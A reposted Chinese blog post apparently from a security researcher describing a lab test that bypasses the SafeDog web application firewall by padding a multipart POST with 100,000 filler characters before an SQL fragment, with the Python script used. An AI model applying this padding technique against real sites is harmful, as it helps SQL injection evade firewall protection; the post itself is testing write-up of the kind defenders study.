注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

 
 
 
 
 

日志

 
 

bypass 最新安全狗  

2014-12-22 16:41:04|  分类: WAF绕过 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

最近在做特征的时候发现IPS的检测中往往会有一个最大检测长度,譬如IPS最大检测长度可能于数据包的个数或则数据流的长度有关。于是乎就想着做了个测试,测试安全狗的检测是否也会有长度的限制,于是乎就有了此篇帖子。

测试步骤:
1:使用wamp搭建一个web环境,并且安装最新版本的安全狗,3.1.0.9833.

2:下面就开始测试了,我使用python书写一个post提交,post提交的内容包括select 1 from table;

3:编写code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
import urllib2
 
 
header = {
    'User-Agent' : 'letmetest',
  'Content-Type' : 'multipart/form-data; boundary=----WebKitFormBoundarycMYRelX1B2H69xy9'
}
 
def getdata(m):
    return "1"*m
 
 
def postdata(n):
 
    data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
 
    data += 'Content-Disposition: form-data; name="file"\r\n\r\n'
 
    data += '%s\r\n' %  "0"*n
 
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n'
 
    data += 'Content-Disposition: form-data; name="submit"\r\n\r\n'
 
    data += 'select 1 from table\r\n'
 
    data += '------WebKitFormBoundarycMYRelX1B2H69xy9--\r\n\r\n'
 
    return data
 
request = urllib2.Request(url,postdata(100000),header)
response = urllib2.urlopen(request).read()
print response

 

4:测试结果
注意postdata中的内容,我自己去改变它的长度,譬如我输入长度为100000的时候,返回的结果如下图:
100000.jpg
可以看到显示的内容为web服务器的内容。

当我将postdata的内容改为长度1000的时候,结果如下:
1000.jpg
这样可以看到内容被安全狗阻拦了。

5:结论
看来安全狗貌似防范的内容受到长度的控制,用这种post的方法可以bypass。

ps.drops上有一篇关于ips的bypass的文章,貌似此方法也可以bypass ips。

http://drops.wooyun.org/papers/4323

 

转自http://zone.wooyun.org/content/17331

 

转载请注明 Sunshie's Blog http://phpinfo.me
原文地址: http://phpinfo.me/2014/12/16/789.html
  评论这张
 
阅读(166)| 评论(0)
推荐

历史上的今天

在LOFTER的更多文章

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017